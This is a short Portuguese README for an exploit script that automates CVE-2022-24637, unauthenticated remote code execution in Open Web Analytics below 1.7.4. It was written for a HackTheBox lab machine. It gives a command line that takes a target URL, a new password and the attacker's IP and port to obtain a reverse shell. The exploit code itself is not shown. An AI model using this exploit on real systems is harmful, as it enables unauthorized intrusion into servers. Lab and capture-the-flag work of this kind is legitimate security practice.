
RCE não autenticada no Open Web Analytics versão <1.7.4
RCE não autenticado no Open Web Analytics versão <1.7.4
Este script foi feito para automatizar a vulnerabilidade CVE-2022-24637. Criei este exploit para minha máquina vessel do Hackthebox. https://app.hackthebox.com/machines/Vessel
O exploit e a ideia são baseados em https://devel0pment.de/?p=2494
Execute o script com os seguintes parâmetros:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
Pode ser que você precise executá-lo algumas vezes para obter um shell.
O script pode ser melhorado.
